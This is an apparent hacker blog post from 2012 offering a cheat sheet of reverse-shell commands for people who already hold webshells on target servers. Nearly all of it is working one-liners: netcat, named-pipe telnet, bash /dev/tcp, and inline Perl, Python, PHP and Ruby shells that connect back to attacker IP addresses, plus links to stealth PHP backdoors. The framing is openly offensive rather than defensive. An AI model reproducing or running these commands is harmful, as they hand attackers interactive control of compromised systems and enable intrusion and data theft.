BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 

Tuesday, January 31, 2012

Having trouble back-connecting? Here ya go!

0 comments
Getting quite a few pms about back-connection recently. Heres my cheatsheet on doing it manually using what the server gives you. This is more or less a backup if a) your webshells aren't working, and b) you don't know why you can't back-connect. Hopefully you won't get stuck again.

After doing recon on your target, assess what you have access to and simply cherry-pick from below. Or just try them all, why the hell not.

1. netcat with GAPING_SECURITY_HOLE enabled:

Code:
TARGET:nc 192.168.1.133 8080 -e /bin/bash
ATTACKER:nc -n -vv -l -p 8080

2. netcat with GAPING_SECURITY_HOLE disabled:

Code:
TARGET:mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER:nc -n -vv -l -p 8080

3. /dev/tcp socket hack

Code:
TARGET:/bin/bash -i > /dev/tcp/192.168.1.133/8080 0<&1 2>&1
ATTACKER:nc -n -vv -l -p 8080

4.no nc or dev/tcp installed?
Code:
TARGET:mknod backpipe p && telnet 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER:nc -n -vv -l -p 8080

5.backup- no good reason to use ahead of the others

Code:
TARGET:telnet 127.0.0.1 8080 | /bin/bash | telnet 127.0.0.1 8888
ATTACKER:nc -n -vv -l -p 8080
ATTACKER2:nc -n -vv -l -p 8888

6.straight bash

Code:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

7.Inline perl
Code:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

8.Python 
Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec​t(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

9.php inline

Code:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

10. Ruby

Code:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

11.xterm (if available)

Code:
xterm -display 10.0.0.1:1



Code:
Php-findsock-shell- designed to bypass egres filtering (fucking firewalls =]) -http://pentestmonkey.net/tools/web-shells/php-findsock-shell

Code:
Weevely- avoid bind shell/reverse shell via console over http - http://www.garage4hackers.com/f11/weevely-stealth-tiny-php-backdoor-1002.html

Code:
WeBaCoo- stealth^2 - http://packetstormsecurity.org/files/108009/webacoo-0.2.zip

But what if I still cant back-connect or nothing happens? - track down the server and take a fucking sledgehammer to it -_-!
©2011, copyright BLACK BURN

0 comments:

Post a Comment

 

7 Years Earning Experience

The Earning Source You Can Trust

Follow by Email